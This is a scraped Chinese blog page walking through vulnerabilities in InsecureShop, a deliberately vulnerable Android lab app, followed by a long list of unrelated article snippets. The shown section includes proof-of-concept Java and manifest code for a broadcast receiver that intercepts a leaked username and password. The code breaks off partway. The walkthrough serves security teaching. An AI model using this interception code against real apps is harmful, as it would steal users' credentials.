tyty2211
tyty2211

【Android安全】insecureshop漏洞挖掘-下

目录

  • 漏洞#9 - 使用隐式intent发送带有敏感数据的广播
    • 1.漏洞分析
    • 2.poc编写
      • 2.1 poc安卓apk targetSdkVersion <=25-依赖清单中声明
      • 2.2 android8及以上-动态注册接收者
  • 漏洞#10 - 拦截隐式intent 加载任意url
    • 1.漏洞分析
  • poc编写
  • 漏洞#11 - 导出的 Activity 中 SetResult 的不安全实现
    • 1.漏洞分析
    • 2.poc编写
  • 漏洞#12 - 不安全的Content Provider
    • 1.漏洞分析
    • 2.poc编写
  • 漏洞#13 - 缺乏 SSL 证书验证
  • 漏洞#14 - 不安全的数据存储
  • 漏洞#15 - 不安全日志

漏洞#9 - 使用隐式intent发送带有敏感数据的广播

1.漏洞分析

AboutUsActivity.class
可以看到通过action隐式发送一个广播,内容为用户名和密码
【Android安全】insecureshop漏洞挖掘-下_第1张图片
这个onSendData是如何触发的呢,再次查看源码,发现当前源码文件中并没有直接调用的地方

怀疑可能在其他地方进行了调用,查看布局文件activity_about_us.xml
在布局文件中,button元素onclick事件关联了onSendData方法
【Android安全】insecureshop漏洞挖掘-下_第2张图片

2.poc编写

2.1 poc安卓apk targetSdkVersion <=25-依赖清单中声明

如果目标targetSdkVersion <=25
想要接收隐式广播,可以在androidManifest.xml中声明注册

<receiver>
    android:name=".vul_broadcastReciever.MyReceiver"
    android:enabled="true"
    android:exported="true">
    <intent-filter>
        <action android:name="com.insecureshop.action.BROADCAST"/>
    intent-filter>
receiver>

MyReceiver.class

public class MyReceiver extends BroadcastReceiver {
   

    @Override
    public void onReceive(Context context, Intent intent) {
   

        if (intent != null){
   
            String action = intent.getAction();
            if ("com.insecureshop.action.BROADCAST".equals(action)){
   
                String username = intent.getStringExtra("username");
                String password = intent.getStringExtra("password");

                if (username != null && password != null ) {
   
                    // 通过显示intent发送数据到activity中
                    Intent intent1 = new Intent(context,Vul_getDataFromBroadcast.class);
                    intent1.putExtra("username",username);
                    intent1.putExtra("password",password);
                    context.startActivity(intent1);
                }
            }
        }
    }
}

Vul_getDataFromBroadcast.class

// 接收数据
String username = getIntent().getStringExtra("username");
String password = getIntent().getStringExtra(&#

你可能感兴趣的:(app安全,android,安全)

  • excel vba 操作word 替换指定内容并复制到指定文件夹 改个名字好哦难 Excelvbaexcelwordc#
    PrivateSubCommandButton1_Click()'读取目标文本,并替换后生成新的文本DimobjAppAsObject'Word.ApplicationDimobjDocAsObject'Word.DocumentDimstrTemplatesAsString'模板文件路径名DimstrFileNameAsString'将数据导出到此文件'工具-引用'MicrosoftWord16
  • 力扣-链表-24 两两交换链表中的节点 夏末秋也凉 力扣#链表leetcode链表算法
    思路1设置虚拟节点作为pre,第一个节点是cur,后一个是post,不断更换顺序并且更改好pre的next代码1classSolution{public:ListNode*swapPairs(ListNode*head){if(!head)returnhead;ListNode*cur=head;ListNode*post=head->next;ListNode*dummpy_head=newLi
  • GD32 基于 CAN 总线 IAP 升级方案 jiuri_1215 MCU开发mcu单片机c语言
    一、引言GD32作为一款性能优异的微控制器,通过基于CAN总线的IAP(InApplicationProgramming,在应用编程)升级方案,能够实现高效、可靠的远程软件更新,为设备的持续优化和维护提供了便捷途径。二、GD32IAP升级方案概览GD32的IAP升级方案打破了传统需要现场连接编程器进行程序更新的局限。借助CAN总线的高可靠性和远距离传输能力,实现了设备在运行状态下的远程自主升级。这
  • 【MQ】如何保证消息队列的高性能? Forest 森林 消息队列MQkafka
    零拷贝Kafka使用到了mmap和sendfile的方式来实现零拷贝。分别对应Java的MappedByteBuffer和FileChannel.transferTo顺序写磁盘Kafka采用顺序写文件的方式来提高磁盘写入性能。顺序写文件,基本减少了磁盘寻道和旋转的次数完成一次磁盘IO,需要经过寻道、旋转和数据传输三个步骤,如果在写磁盘的时候省去寻道、旋转可以极大地提高磁盘读写的性能。Kafka中每
  • 探索AWS Event Fork Pipelines:构建弹性事件驱动架构 费津钊Bobbie
    探索AWSEventForkPipelines:构建弹性事件驱动架构aws-serverless-event-fork-pipelinesAWSEventForkPipelineshelpsyoubuildevent-drivenserverlessapplicationsbyprovidingpipelinesforcommonevent-handlingrequirements,suchase
  • 推荐开源项目:Bluezone——共抗疫情的接触者追踪应用 潘惟妍
    推荐开源项目:Bluezone——共抗疫情的接触者追踪应用bluezone-appBluezone-Bảovệmình,bảovệcộngđồng项目地址:https://gitcode.com/gh_mirrors/bl/bluezone-app在当前全球COVID-19大流行的情景下,Bluezone是一款开源的接触者追踪软件,旨在帮助我们更好地保护自己和社区的安全。该项目基于R
  • Bluezone 开源项目教程 朱均添Fleming
    Bluezone开源项目教程bluezone-appBluezone-Bảovệmình,bảovệcộngđồng项目地址:https://gitcode.com/gh_mirrors/bl/bluezone-app1、项目介绍Bluezone是一个开源的Android应用程序,旨在管理和监控用户的花园和游泳池。该项目由SenkronYazilimAŞ开发,提供了丰富的功能,包括自
  • <sa8650>QCX Usecase 使用详解—高通下一代camera< QCX >架构 waterAdmin 车载系统视觉检测c++c语言架构
    <sa8650>QCXUsecase使用详解—高通下一代camera架构一、QualcommCameraNext(QCX)architecture1.1ClientApplication:1.2ClientManager:1.3QCarCamAPI:1.4StreamManager:1.5CamXLib/Component:1.6CHIcustomizations:1.7CamXCorelib:1
  • BlueZone:实现六边形架构的停车支付应用 樊思露Roger
    BlueZone:实现六边形架构的停车支付应用bluezoneAnexampleapplicationimplementingHexagonalArchitecture项目地址:https://gitcode.com/gh_mirrors/blu/bluezone项目介绍BlueZone是一个基于六边形架构(HexagonalArchitecture)的示例应用,旨在为城市中的汽车驾驶员提供远程停
  • 日志收集Day008 ccnnlxc java开发语言
    1.zk集群优化修改zookeeper的堆内存大小,一般情况下,生产环境给到2G足以,如果规模较大可以适当调大到4G。(1)配置ZK的堆内存vim/app/softwares/zk/conf/java.envexportJAVA_HOME=/sortwares/jdk1.8.0_291exportJVMFLAGS="-Xms256m-Xmx256m$JVMFLAGS"EOF(2)同步文件到其他节点
  • Hadoop学习笔记 --- YARN执行流程与工作原理 杨鑫newlfe 数据仓库大数据挖掘与大数据应用案例YARNHadoop大数据资源调度数据仓库
    一、YARN简述首先介绍一下YARN在Hadoop2.0版本引进的资源管理系统,直接从MapReduceV1演化而来(由于引擎的功能缺陷);原因是将MapReduce1中的JobTracker的资源管理和作业调度两个功能分开,分别由ResourceManager和ApplicationMaster进行实现;ResourceManager:负责整个集群的资源管理和调度ApplicationMaste
  • 手机APP软件测试与开发——夜神模拟器的安装与下载 AE—Darren洋 APP测试app测试测试工具夜神模拟器模拟器
    一、下载夜神模拟器夜神模拟器官网下载地址:https://www.yeshen.com二、安装夜神模拟器(1)双击安装包后进入安装界面,点击自定义安装进行安装路径选择(路径建议不要选择C盘)。(2)安装完成打开夜深模拟器后,点击右上角设置按钮进行设置,点击性能设置,再看分辨率那一栏,改为手机版即可。
  • 【Yarn】Yarn 架构体系、通讯协议、yarn交互流程 九师兄 大数据-hadoop架构java运维
    文章目录1.概述2.ResourceManager3.NodeManager4.ApplicationMaster5.Container容器6.通讯协议7.yarn交互流程7.1YARN上应用类型7.2整体流程大年初二,凑够3400篇文章,神秘代码:5Lmd5biI5YWE5ZSv5LiA5Y6f5Yib5paH56ug77yM56aB5q2i6L2s6L291.概述yarn有3大组件,想明白组件
  • MyBatis-Plus 逆向工程原理及使用指南 吴冰_hogan mybatisoracletomcat
    概述MyBatis-Plus(简称MP)是MyBatis的增强工具,它简化了开发人员对数据库的操作,并提供了代码生成器、分页插件等功能。其中的代码生成器(即逆向工程),能够根据数据库中的表结构自动生成实体类(Entity)、Mapper接口、Service层及Controller层的基础代码,从而极大地减少了开发初期的手动编码工作量。逆向工程原理数据库元数据读取:MyBatis-Plus使用JDB
  • React Props: Understanding and Utilizing Props in React Applications froginwe11 开发语言
    ReactProps:UnderstandingandUtilizingPropsinReactApplicationsIntroductionIntheworldofReact,propsplayacrucialroleincomponentcommunication.Shortfor"properties,"propsareessentiallyargumentspassedintoReact
  • 【计算机网络】NAT应用 酱学编程 计算机网络计算机网络网络智能路由器
    NAT(NetworkAddressTranslation)的定义:NAT(NetworkAddressTranslation)的定义:NAT是一种网络技术,用于在IP数据包通过路由器或防火墙时修改其源IP地址或目的IP地址。主要目的是解决IP地址短缺问题,同时也能为网络提供一定程度的安全保护。NAT的主要功能和作用:地址转换源地址转换****(SNAT):iptables-tnat-APOSTR
  • Optional char parameter ‘questionNum‘ is present but cannot be translated into a null value fengfeng N 前端javascript数据库
    Optionalcharparameter'questionNum'ispresentbutcannotbetranslatedintoanullvalueduetobeingdeclaredasaprimitivetype.Considerdeclaringitasobjectwrapperforthecorrespondingprimitivetype.报错信息如上,错误信息指出,当尝试将一个
  • C#操作GIF图片(下)将一帧一帧的图片合并成gif 我曾经是个程序员 常用代码片段c#开发语言
    见过不少人、经过不少事、也吃过不少苦,感悟世事无常、人心多变,靠着回忆将往事串珠成链,聊聊感情、谈谈发展,我慢慢写、你一点一点看......stringnewPath=Application.StartupPath+"\\new.gif";Listimgs=Directory.GetFiles(Application.StartupPath+"\\images\\","*.jpg").ToList
  • 一文大白话讲清楚webpack基本使用——18——HappyPack 16年上任的CTO webpackwebpack前端node.jshappypack
    文章目录一文大白话讲清楚webpack基本使用——18——HappyPack1.建议按文章顺序从头看,一看到底,豁然开朗2.啥是HappyPack3.怎么使用HappyPack一文大白话讲清楚webpack基本使用——18——HappyPack1.建议按文章顺序从头看,一看到底,豁然开朗第一篇:一文大白话讲清楚啥是个webpack第二篇:一文大白话讲清楚webpack基本使用——1——完成webp
  • 深入Kotlin语言在Android开发中的应用_Android_lecture07 新职语
    本文还有配套的精品资源,点击获取简介:在Android开发领域,Kotlin凭借其简洁性、安全性和强大的交互能力已经成为首选编程语言。本讲座将深入讲解Kotlin的基础语法、空安全、类型系统、高阶函数与Lambda表达式、扩展函数与属性、Anko库、协程、Android核心组件以及数据绑定。同时,还将介绍Dagger2或Hilt依赖注入、MVVM架构和AndroidJetpack组件等高级技巧,并
  • 微服务中的设计模式:如何使用 API 网关、服务注册与发现等模式 全栈探索者chen 微服务微服务设计模式架构开发语言APIweb安全网关
    微服务中的设计模式:如何使用API网关、服务注册与发现等模式在微服务架构中,系统被拆分为许多独立的服务,每个服务专注于一个业务功能。虽然这种架构提供了高可扩展性和灵活性,但也带来了复杂性,例如服务之间的通信、负载均衡、安全性等问题。因此,设计模式的应用显得尤为重要。本文将探讨在微服务架构中常用的设计模式,特别是API网关、服务注册与发现,并结合示例说明如何实现这些模式。一、API网关模式1.什么是
  • 修改 ssh 默认访问端口 技术分享,共享成长 linuxssh运维
    Linux最小化安装后默认带有ssh服务并正常运行,服务默认端口为“22”。为了确保访问网络的安全,很多用户的网络设备对“22”端口做了限制,这时我们需要修改ssh服务默认的端口。此步骤建议直接在服务器上通过鼠标键盘操作修改配置文件vi/etc/ssh/sshd_config上图中将默认的“22”端口修改为端口“22345”,如上图所示,修改完毕后保存退出防火墙端口放行firewall-cmd--
  • 热备份和冷备份 K. Bob MySQL
    目录冷备份热备份双机热备的实现模式冷备份  冷备份发生在数据库已经正常关闭的情况下,当正常关闭时会提供一个完整的数据库。冷备份是将关键性文件拷贝到另外位置的一种说法。对于备份数据库信息而言,冷备份是最快和最安全的方法。冷备份的优点:1.是非常快速的备份方法(只需拷贝文件)2.容易归档(简单拷贝即可)3.容易恢复到某个时间点上(只需将文件再拷贝回去)4.能与归档方法相结合,作数据库“最新状态”的恢复
  • 鸿蒙学习自由流转与分布式运行环境-价值与架构定义(1) 技术分享,共享成长 鸿蒙harmonyos学习架构
    文章目录价值与架构定义1、价值2、架构定义随着个人设备数量越来越多,跨多个设备间的交互将成为常态。基于传统OS开发跨设备交互的应用程序时,需要解决设备发现、设备认证、设备连接、数据同步等技术难题,不但开发成本高,还存在安全隐私、兼容性、性能等诸多问题。为了适应万物互联时代的环境变化,鸿蒙系统构建了基于分布式运行环境所需要的基础设施,为开发者提供了基础的分布式框架能力,使开发者可以更方便的实现跨设备
  • 分布式架构搭建 ManchiBB 分布式架构
    搭建分布式架构涉及多个方面,包括系统设计、网络架构、数据存储、服务拆分、负载均衡、容错处理等。基本步骤和考虑因素1、需求分析明确业务需求,包括系统的功能、性能、扩展性、安全性等要求。确定系统的用户规模、数据规模以及可能的增长趋势。2、系统设计微服务架构:将系统拆分为多个独立的服务,每个服务负责特定的业务功能。这有助于提高系统的可维护性和可扩展性。服务治理:使用服务注册与发现、负载均衡、熔断降级等机
  • html手机端富文本,移动端富文本踩坑 weixin_39608657 html手机端富文本
    最近在做一个vue的项目。之前的前端同事离职了,和女朋友去云南潇洒去了,剩下我一个苦逼坐在电脑前哒哒哒敲代码。刚刚接手就开始做移动端富文本编辑器的需求。主管说压了半个月,尽快做出来。在网上找了不少编辑器,前段时间做过react的后台项目,用了百度的编辑器。功能很多很强,遗憾的是ios不支持flash,在移动端并不适用。因为要兼容ios和Android,而且还要在vue的项目中使用,在网上找了很多编
  • 前端js变量踩坑,部分手机浏览器不支持let、const weixin_34244102 前端python移动开发ViewUI
    2019独角兽企业重金招聘Python工程师标准>>>浏览器通过userAgent判断机型是Android还是iOS,很简单的几行代码,总有iOS用户手机判断不出来。刚开始总以为是判断的错误,优化了好几版,鉴于身边一直没有真机,终是治标不治本,今日偶遇真机,恍然大悟。。。var才是简单js的王道,引以为鉴转载于:https://my.oschina.net/AmosWang/blog/301786
  • 《spring编程常见错误50例》学习笔记 Day1 qq_31273845 学习spring
    1.为什么有时候我们代码移了一下包,就扫描不到了?在构建web服务的时候,我们启动服务程度如果不设置扫描包的话,默认会扫描运行程序所在的包。如果包和应用程序不在同一个包,就会失效。这个之前知道,至于为什么?今天才了解到,我就这里复述一下:@SpringBootApplication里面会有@ComponentScan注解。参考配置如下@ComponentScan(excludeFilters={@
  • JVM学习总结-集合 北山璎珞 JVMJVMJVM学习jvm总结深入了解JVMJVM调优
    1.聊聊JVM2.JVM内存管理:深入Java内存区域与OOM3.java线程安全(总结)4.JVM内存管理:深入垃圾收集器(六种垃圾收集器)与内存分配策略5.JVM调优总结(一)
  • tcp/ip协议中ip层协议,tcp/ip协议中ip协议属于 zzyh123456 tcp/ip网络网络协议
    在TCP/IP协议栈中,IP(InternetProtocol)协议属于网络层(NetworkLayer)。TCP/IP协议栈是一个四层架构,从上到下依次为:应用层(ApplicationLayer):这一层提供了应用程序间通信的接口,如HTTP、FTP、SMTP等协议都在这一层。传输层(TransportLayer):这一层负责应用程序之间的数据传输,包括面向连接的TCP(Transmissio
  • 强大的销售团队背后 竟然是大数据分析的身影 蓝儿唯美 数据分析
    Mark Roberge是HubSpot的首席财务官,在招聘销售职位时使用了大量数据分析。但是科技并没有挤走直觉。 大家都知道数理学家实际上已经渗透到了各行各业。这些热衷数据的人们通过处理数据理解商业流程的各个方面,以重组弱点,增强优势。 Mark Roberge是美国HubSpot公司的首席财务官,HubSpot公司在构架集客营销现象方面出过一份力——因此他也是一位数理学家。他使用数据分析
  • Haproxy+Keepalived高可用双机单活 bylijinnan 负载均衡keepalivedhaproxy高可用
    我们的应用MyApp不支持集群,但要求双机单活(两台机器:master和slave): 1.正常情况下,只有master启动MyApp并提供服务 2.当master发生故障时,slave自动启动本机的MyApp,同时虚拟IP漂移至slave,保持对外提供服务的IP和端口不变 F5据说也能满足上面的需求,但F5的通常用法都是双机双活,单活的话还没研究过 服务器资源 10.7
  • eclipse编辑器中文乱码问题解决 0624chenhong eclipse乱码
    使用Eclipse编辑文件经常出现中文乱码或者文件中有中文不能保存的问题,Eclipse提供了灵活的设置文件编码格式的选项,我们可以通过设置编码 格式解决乱码问题。在Eclipse可以从几个层面设置编码格式:Workspace、Project、Content Type、File 本文以Eclipse 3.3(英文)为例加以说明: 1. 设置Workspace的编码格式: Windows-&g
  • 基础篇--resources资源 不懂事的小屁孩 android
    最近一直在做java开发,偶尔敲点android代码,突然发现有些基础给忘记了,今天用半天时间温顾一下resources的资源。 String.xml    字符串资源   涉及国际化问题  http://www.2cto.com/kf/201302/190394.html   string-array
  • 接上篇补上window平台自动上传证书文件的批处理问卷 酷的飞上天空 window
    @echo off : host=服务器证书域名或ip,需要和部署时服务器的域名或ip一致 ou=公司名称, o=公司名称 set host=localhost set ou=localhost set o=localhost set password=123456 set validity=3650 set salias=s
  • 企业物联网大潮涌动:如何做好准备? 蓝儿唯美 企业
    物联网的可能性也许是无限的。要找出架构师可以做好准备的领域然后利用日益连接的世界。 尽管物联网(IoT)还很新,企业架构师现在也应该为一个连接更加紧密的未来做好计划,而不是跟上闸门被打开后的集成挑战。“问题不在于物联网正在进入哪些领域,而是哪些地方物联网没有在企业推进,” Gartner研究总监Mike Walker说。 Gartner预测到2020年物联网设备安装量将达260亿,这些设备在全
  • spring学习——数据库(mybatis持久化框架配置) a-john mybatis
    Spring提供了一组数据访问框架,集成了多种数据访问技术。无论是JDBC,iBATIS(mybatis)还是Hibernate,Spring都能够帮助消除持久化代码中单调枯燥的数据访问逻辑。可以依赖Spring来处理底层的数据访问。 mybatis是一种Spring持久化框架,要使用mybatis,就要做好相应的配置: 1,配置数据源。有很多数据源可以选择,如:DBCP,JDBC,aliba
  • Java静态代理、动态代理实例 aijuans Java静态代理
    采用Java代理模式,代理类通过调用委托类对象的方法,来提供特定的服务。委托类需要实现一个业务接口,代理类返回委托类的实例接口对象。 按照代理类的创建时期,可以分为:静态代理和动态代理。 所谓静态代理: 指程序员创建好代理类,编译时直接生成代理类的字节码文件。 所谓动态代理: 在程序运行时,通过反射机制动态生成代理类。   一、静态代理类实例: 1、Serivce.ja
  • Struts1与Struts2的12点区别 asia007 Struts1与Struts2
    1) 在Action实现类方面的对比:Struts 1要求Action类继承一个抽象基类;Struts 1的一个具体问题是使用抽象类编程而不是接口。Struts 2 Action类可以实现一个Action接口,也可以实现其他接口,使可选和定制的服务成为可能。Struts 2提供一个ActionSupport基类去实现常用的接口。即使Action接口不是必须实现的,只有一个包含execute方法的P
  • 初学者要多看看帮助文档 不要用js来写Jquery的代码 百合不是茶 jqueryjs
    解析json数据的时候需要将解析的数据写到文本框中,  出现了用js来写Jquery代码的问题;   1, JQuery的赋值  有问题    代码如下: data.username 表示的是:  网易            $("#use
  • 经理怎么和员工搞好关系和信任 bijian1013 团队项目管理管理
            产品经理应该有坚实的专业基础,这里的基础包括产品方向和产品策略的把握,包括设计,也包括对技术的理解和见识,对运营和市场的敏感,以及良好的沟通和协作能力。换言之,既然是产品经理,整个产品的方方面面都应该能摸得出门道。这也不懂那也不懂,如何让人信服?如何让自己懂?就是不断学习,不仅仅从书本中,更从平时和各种角色的沟通
  • 如何为rich:tree不同类型节点设置右键菜单 sunjing contextMenutreeRichfaces
    组合使用target和targetSelector就可以啦,如下: <rich:tree id="ruleTree" value="#{treeAction.ruleTree}" var="node" nodeType="#{node.type}" selectionChangeListener=&qu
  • 【Redis二】Redis2.8.17搭建主从复制环境 bit1129 redis
    开始使用Redis2.8.17 Redis第一篇在Redis2.4.5上搭建主从复制环境,对它的主从复制的工作机制,真正的惊呆了。不知道Redis2.8.17的主从复制机制是怎样的,Redis到了2.4.5这个版本,主从复制还做成那样,Impossible is nothing! 本篇把主从复制环境再搭一遍看看效果,这次在Unbuntu上用官方支持的版本。   Ubuntu上安装Red
  • JSONObject转换JSON--将Date转换为指定格式 白糖_ JSONObject
    项目中,经常会用JSONObject插件将JavaBean或List<JavaBean>转换为JSON格式的字符串,而JavaBean的属性有时候会有java.util.Date这个类型的时间对象,这时JSONObject默认会将Date属性转换成这样的格式:   {"nanos":0,"time":-27076233600000,
  • JavaScript语言精粹读书笔记 braveCS JavaScript
    【经典用法】:   //①定义新方法 Function .prototype.method=function(name, func){ this.prototype[name]=func; return this; } //②给Object增加一个create方法,这个方法创建一个使用原对
  • 编程之美-找符合条件的整数 用字符串来表示大整数避免溢出 bylijinnan 编程之美
    import java.util.LinkedList; public class FindInteger { /** * 编程之美 找符合条件的整数 用字符串来表示大整数避免溢出 * 题目:任意给定一个正整数N,求一个最小的正整数M(M>1),使得N*M的十进制表示形式里只含有1和0 * * 假设当前正在搜索由0,1组成的K位十进制数
  • 读书笔记 chengxuyuancsdn 读书笔记
    1、Struts访问资源 2、把静态参数传递给一个动作 3、<result>type属性 4、s:iterator、s:if c:forEach 5、StringBuilder和StringBuffer 6、spring配置拦截器 1、访问资源 (1)通过ServletActionContext对象和实现ServletContextAware,ServletReque
  • [通讯与电力]光网城市建设的一些问题 comsci 问题
          信号防护的问题,前面已经说过了,这里要说光网交换机与市电保障的关系       我们过去用的ADSL线路,因为是电话线,在小区和街道电力中断的情况下,只要在家里用笔记本电脑+蓄电池,连接ADSL,同样可以上网........     
  • oracle 空间RESUMABLE daizj oracle空间不足RESUMABLE错误挂起
    空间RESUMABLE操作  转 Oracle从9i开始引入这个功能,当出现空间不足等相关的错误时,Oracle可以不是马上返回错误信息,并回滚当前的操作,而是将操作挂起,直到挂起时间超过RESUMABLE TIMEOUT,或者空间不足的错误被解决。 这一篇简单介绍空间RESUMABLE的例子。 第一次碰到这个特性是在一次安装9i数据库的过程中,在利用D
  • 重构第一次写的线程池 dieslrae 线程池 python
    最近没有什么学习欲望,修改之前的线程池的计划一直搁置,这几天比较闲,还是做了一次重构,由之前的2个类拆分为现在的4个类. 1、首先是工作线程类:TaskThread,此类为一个工作线程,用于完成一个工作任务,提供等待(wait),继续(proceed),绑定任务(bindTask)等方法 #!/usr/bin/env python # -*- coding:utf8 -*-
  • C语言学习六指针 dcj3sjt126com c
    初识指针,简单示例程序: /* 指针就是地址,地址就是指针 地址就是内存单元的编号 指针变量是存放地址的变量 指针和指针变量是两个不同的概念 但是要注意: 通常我们叙述时会把指针变量简称为指针,实际它们含义并不一样 */ # include <stdio.h> int main(void) { int * p; // p是变量的名字, int *
  • yii2 beforeSave afterSave beforeDelete dcj3sjt126com delete
    public function afterSave($insert, $changedAttributes) { parent::afterSave($insert, $changedAttributes); if($insert) { //这里是新增数据 } else { //这里是更新数据 } }  
  • timertask shuizhaosi888 timertask
    java.util.Timer timer = new java.util.Timer(true); // true 说明这个timer以daemon方式运行(优先级低, // 程序结束timer也自动结束),注意,javax.swing // 包中也有一个Timer类,如果import中用到swing包, // 要注意名字的冲突。 TimerTask task = new
  • Spring Security(13)——session管理 234390216 sessionSpring Security攻击保护超时
    session管理 目录   1.1     检测session超时 1.2     concurrency-control 1.3     session 固定攻击保护         
  • 公司项目NODEJS实践0.3[ mongo / session ...] 逐行分析JS源代码 mongodbsessionnodejs
        http://www.upopen.cn   一、前言         书接上回,我们搭建了WEB服务端路由、模板等功能,完成了register 通过ajax与后端的通信,今天主要完成数据与mongodb的存取,实现注册 / 登录 /
  • pojo.vo.po.domain区别 LiaoJuncai javaVOPOJOjavabeandomain
      POJO = "Plain Old Java Object",是MartinFowler等发明的一个术语,用来表示普通的Java对象,不是JavaBean, EntityBean 或者 SessionBean。POJO不但当任何特殊的角色,也不实现任何特殊的Java框架的接口如,EJB, JDBC等等。      即POJO是一个简单的普通的Java对象,它包含业务逻辑
  • Windows Error Code OhMyCC windows
    0 操作成功完成. 1 功能错误. 2 系统找不到指定的文件. 3 系统找不到指定的路径. 4 系统无法打开文件. 5 拒绝访问. 6 句柄无效. 7 存储控制块被损坏. 8 存储空间不足, 无法处理此命令. 9 存储控制块地址无效. 10 环境错误. 11 试图加载格式错误的程序. 12 访问码无效. 13 数据无效. 14 存储器不足, 无法完成此操作. 15 系
  • 在storm集群环境下发布Topology roadrunners 集群stormtopologyspoutbolt
    storm的topology设计和开发就略过了。本章主要来说说如何在storm的集群环境中,通过storm的管理命令来发布和管理集群中的topology。   1、打包 打包插件是使用maven提供的maven-shade-plugin,详细见maven-shade-plugin。 <plugin> <groupId>org.apache.maven.
  • 为什么不允许代码里出现“魔数” tomcat_oracle java
      在一个新项目中,我最先做的事情之一,就是建立使用诸如Checkstyle和Findbugs之类工具的准则。目的是制定一些代码规范,以及避免通过静态代码分析就能够检测到的bug。   迟早会有人给出案例说这样太离谱了。其中的一个案例是Checkstyle的魔数检查。它会对任何没有定义常量就使用的数字字面量给出警告,除了-1、0、1和2。   很多开发者在这个检查方面都有问题,这可以从结果
  • zoj 3511 Cake Robbery(线段树) 阿尔萨斯 线段树
    题目链接:zoj 3511 Cake Robbery 题目大意:就是有一个N边形的蛋糕,切M刀,从中挑选一块边数最多的,保证没有两条边重叠。 解题思路:有多少个顶点即为有多少条边,所以直接按照切刀切掉点的个数排序,然后用线段树维护剩下的还有哪些点。 #include <cstdio> #include <cstring> #include <vector&
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他